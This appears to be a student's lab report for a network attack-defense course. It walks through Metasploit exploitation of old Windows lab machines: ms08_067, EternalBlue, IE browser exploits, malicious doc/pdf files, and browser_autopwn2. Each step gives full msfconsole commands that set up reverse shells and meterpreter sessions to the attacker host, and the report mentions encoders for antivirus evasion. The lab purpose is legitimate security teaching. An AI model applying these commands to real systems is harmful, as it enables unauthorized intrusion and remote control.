2018-2019-2 20165323《网络攻防技术》Exp5 MSF基础应用
一、知识点总结
1.MSF攻击方法
主动攻击:扫描主机漏洞,进行攻击
攻击浏览器
攻击其他客户端
2.MSF的六种模块
渗透攻击模块Exploit Modules:攻击漏洞,把shellcode"背"过去
主动渗透攻击:攻击某个系统服务
被动渗透攻击:攻击某个客户端应用
辅助模块Auxiliary Modules:在进行渗透攻击之前得到目标系统丰富的情报信息,它是攻击的前提
网络服务的扫描与查点
探查敏感信息泄露、Fuzz测试发掘漏洞
收集登录密码
攻击载荷Payload Modules:载荷,一段指令(shellcode),目标系统在被渗透攻击之后去执行的代码
空字段模块Nop Modules
一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令,即空指令(滑行区)
由于系统无法精确计算shellcode的起始地址,所以加入nops以增加攻击成功的概率
编码模块Encoders
改变payload形状,使得不出现特定字符
确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”
后渗透攻击模块Post:攻击成功之后,动态传输代码使其在被控机执行
查看六种模块源码目录/usr/share/metasploit-framework/modules
3.MSF的三种用户操作界面
msfconsole
查看模块的具体信息info [exploits|auxiliary|post|payloads|encoders|nops]
查看设置信息show [options]
查看攻击目标类型show [target]
查找命令search
查找2016年产生的在windows平台下的漏洞search ms16 type:exploit platform:windows
启动数据库我参考了这篇博客
此次攻击的目标主动攻击的实践
ms08_067
payload/generic/shell_reverse_tcp(成功)
ms17_010_eternalblue
payload/generic/shell_reverse_tcp(成功)
攻击浏览器的实践
ms11_050(失败)
ms14_064
````payload : generic/shell_reverse_tcp(成功) ms10_002 set payload windows/meterpreter/reverse_tcp```(成功且唯一)
攻击客户端的实践
Adobe(成功)
ms11_006(失败)
成功应用任何一个辅助模块
auxiliary/server/browser_autopwn2(成功且唯一)
成功进行进程迁移
二、攻击实例
Exp5-1 实现ms08_067
靶机:Microsoft Windows XP sp3 (English)
payload : generic/shell_reverse_tcp
实验步骤
- 使用命令
msfconsole启动Metasploit终端 - 然后使用命令
search ms08_067搜索该漏洞对应的模块
- 输入命令
use exploit/windows/smb/ms08_067_netapi - 使用命令
show targets查看渗透攻击模块可以成功渗透攻击的平台(其中我选择的是7)
之后输入以下命令
msf exploit(ms08_067_netapi) > show payloads//查看可用的攻击载荷
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.238 //控制主机ip
msf exploit(ms08_067_netapi) > set LPORT 5323 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.235 //靶机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //攻击
由图中看出,回连失败了,此时我将端口进行了更改,结果如下,并输入sysinfo查看靶机信息
输入ipconfig/all查看靶机ip地址
Exp5-2 实现MS17_010_eternalblue
靶机:Microsoft Windows 2008
payload : generic/shell_reverse_tcp
实验步骤
同Exp5-1类似,在终端中输入指令之后,使用命令show options 查看所配置的选项
之后输入指令exploit对靶机进行渗透攻击,如图所示,此处失败了,显示端口已被占用
将端口进行更改之后再次尝试,成功了
输入sysinfo查看靶机系统信息
Exp5-3 实现ms11_050
靶机:Microsoft Windows XP SP3 + IE8
payload : generic/shell_reverse_tcp
实验步骤
搜索漏洞search ms11_050
使用漏洞use exploit/windows/browser/ms11_050_mshtml_cobjectelement
设置靶机类型set target 3
选择攻击载荷set payload generic/shell_reverse_tcp
使用命令set SRVHOST 192.168.1.238设置地址
配置好地址后显示配置信息show options
而后exploit对此进行攻击,将产生的链接复制至靶机IE中打开,此时kali中会出现回连信息
最后失败了,当靶机打开该链接时会停止工作,链接被阻止,现在尚未想出解决方法
Exp5-4 实现ms14_064
靶机:Microsoft Windows XP SP3 + IE8
payload : generic/shell_reverse_tcp
实验步骤
首先搜索漏洞,然后使用漏洞,使用show payloads查看适用攻击载荷
选择攻击载荷set payload generic/shell_reverse_tcp
查看配置信息show options
而后通过查看配置信息添加所需选项
使用命令set SRVHOST 192.168.1.238以及 set LHOST 192.168.1.238设置地址
使用命令exploit对此进行攻击,将产生的链接复制至靶机IE中打开,此时kali中会出现回连信息
通过输入sessions -i 1获取会话连接,并输入ipconfig验证是否为靶机地址
再尝试输入shell查看结果
Exp5-5 实现ms10_002(唯一)
靶机:Microsoft Windows XP + IE8
set payload windows/meterpreter/reverse_tcp(唯一)
实验步骤
使用漏洞:use windows/browser/ms10_002_aurora
接下来的设置步骤同上一个类似,具体如下图所示
将产生的链接复制到xp中去,使用IE浏览器打开,产生回连
通过输入sessions -i 1 获取会话连接
运行run migrate尝试进行进程迁移,并输入ipconfig查看靶机IP是否一致
Exp5-6 实现ms11_006(唯一)
靶机:Microsoft Windows XP
实验步骤
使用漏洞:use windows/fileformat/ms11_006_createsizeddibsection
选择攻击载荷:set payload windows/meterpreter/reverse_tcp
设置攻击机地址及端口set LHOST 192.168.1.238 以及set LPORT 443
进行渗透攻击:exploit
此时将产生的msf.doc文件复制到xp中
在kali中输入命令use multi/handler进行监听,
然后输入配置条件,结束后输入exploit进行攻击,如下图所示
在xp中打开该文件
而后没有出现回连,失败了
我尝试输入show targets查看可攻击目标
发现选择target 0(自动)是失败的,而在target 2中的xp不兼容网上所下载的office word,需要英文版,所以还未解决这个问题
Exp5-7 实现Adobe
靶机:Windows XP sp3(English)
实验步骤
search adobe #进行查找
use windows/fileformat/adobe_cooltype_sing #使用漏洞
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.238#攻击者地址
set FILENAME 20165323.pdf #设置生成pdf文件的文件名
exploit #攻击
将生成的20165323.pdf复制到Windows XP中
use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set LHOST 192.168.1.238 #攻击者地址
exploit #攻击
```
在xp中打开此pdf文件
回连成功
### Exp5-8 实现辅助模块
靶机:Windows XP sp3(English)
实验步骤
``` search use auxiliary/server```查看可用的辅助模块
使用```use auxiliary/server/browser_autopwn2 ```进入该模块
通过```info```查看该模块的功能,该模块将自动提供浏览器漏洞利用
首先输入```show options```查看需要配置的信息
进行相应的配置
```
set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.238
set URIPATH “20165323”
```
接下来进行渗透攻击```exploit``` 并将产生的链接复制至xp中的IE浏览器进行打开
成功了
接下来通过输入```sessions -i 2```获取会话连接,输入```dir```以及```ipconfig```进行验证是否回连成功
## 三、实验中遇到的问题及解决方案
在使用“永恒之蓝”进行渗透攻击时,出现以下问题
解决方法:查看解释后发现端口被占用了,将端口更改后便可以进行攻击
## 四、实验总结
1.实验总结与体会
通过本次实验,我了解了更多的攻击方法和一些漏洞的使用情况,其实漏洞哪里都有,系统、软件这些都可以存在漏洞,以前我觉得我的本机在电脑管家中有时候弹出修补漏洞没啥用,现在看来,还是好好更新吧。在这个实验中也出现了很多问题,出现了这种不能回连的怪异的情况,也学会了很多解决问题和分析问题的方法,
2.离实战还缺些什么技术
感觉大部分是按照教程来做的,离实战还很遥远
3.用自己的话解释什么是exploit,payload,encode.
```exploit```攻击者对靶机进行渗透攻击的这一过程
```payload```类似于之前实验中的shellcode,是攻击者进行攻击的“武器”
```encode编码```改编代码,防杀软识别2018-2019-2 20165323《网络攻防技术》Exp5 MSF基础应用的更多相关文章
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155318 《网络攻防》Exp5 MSF基础应用
20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155301 《网络攻防》 Exp5 MSF基础应用
20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...
- 20155321 《网络攻防》 Exp5 MSF基础应用
20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...
- 20155338 《网络攻防》Exp5 MSF基础应用
20155338 <网络攻防>Exp5 MSF基础应用 基础问题回答 1. 用自己的话解释什么是exploit,payload,encode? exploit将真正要负责攻击的代码传送到靶 ...
- 2015306 白皎 《网络攻防》Exp5 MSF基础应用
2015306 白皎 <网络攻防>Exp5 MSF基础应用 一.基础问题 用自己的话解释什么是exploit,payload,encode. exploit指由攻击者或渗透测试者利用一个系 ...
- 20155334 《网络攻防》Exp5 MSF基础应用
一.基础问题回答 解释exploit,payload,encode是什么: 项目 作用 exploit 是负载有用代码的交通工具,让代码到达目的地,并作用 payload 是有具体功能的代码,能够完成 ...
- 20155211 网络攻防技术 Exp08 Web基础
20155211 网络攻防技术 Exp08 Web基础 实践内容 Web前端HTML,能正常安装.启停Apache.理解HTML,理解表单,理解GET与POST方法,编写一个含有表单的HTML. We ...
随机推荐
- 【LOJ6515】贪玩蓝月
题目大意 有一个双端队列,每个元素是一个物品,每个物品有体积和价值两个属性. 有 \(n\) 个操作,分为 \(5\) 种:前后端插入删除,还有询问:选出一些物品,满足这些物品的体积之和模 \(p\) ...
- MT【327】两道不等式题
当$x,y\ge0,x+y=2$时求下面式子的最小值:1)$x+\sqrt{x^2-2x+y^2+1}$2)$\dfrac{1}{5}x+\sqrt{x^2-2x+y^2+1}$ 解:1)$P(x,y ...
- 使用lambda表达式对相同属性的实体进行合并
List<CrmAuthorizedInfo> crmAuthorizedInfos = flowPlanInfoMapper.findAllByEncode(stationForm.ge ...
- react16 渲染流程
前言 react升级到16之后,架构发生了比较大的变化,现在不看,以后怕是看不懂了,react源码看起来也很麻烦,也有很多不理解的地方. 大体看了一下渲染过程. react16架构的变化 react ...
- 原型模式-Prototype(Java实现)
原型模式-Prototype 通过复制(克隆.拷贝)一个指定类型的对象来创建更多同类型的对象. 就像去蛋糕店买蛋糕一样. 柜台里的蛋糕都是非卖品. 只是为顾客提供一种参照. 当顾客看上某一个样式的蛋糕 ...
- shell 生成文件统计信息
#!/bin/bash #file name : filestat.sh if [ $# -ne 1 ]; then echo "Usage is $0 basepath"; ex ...
- [C++]类成员返回语句 return *this 的理解
经常会在类似 copy-assignment 的成员函数看到返回语句 return *this ,这类函数通常返回类型是所属类的引用. 类成员函数的隐式指针 class *this const 经过 ...
- java(12)字符串
一.字符串概述 1.1如何使用字符串 1)定义并初始化字符串 2)使用字符串,对字符串进行一些处理 1.2字符串的长度 语法: 字符串1.length(); -->返回字符串1的长度 publ ...
- 一道Python面试题:给出d = [True, False, True, False, True],请利用列表d,只用一句话返回列表[0,2,4]
看题:给出d = [True, False, True, False, True],请利用列表d,只用一句话返回列表[0,2,4] 这道题的关键是拿到True的索引值,最初我是用list的index方 ...
- jquery获取value值时将数字型字符串前面的0自动截取处理方法
<li class="cwhite" value="02" id="02" onclick="getQuestionList ...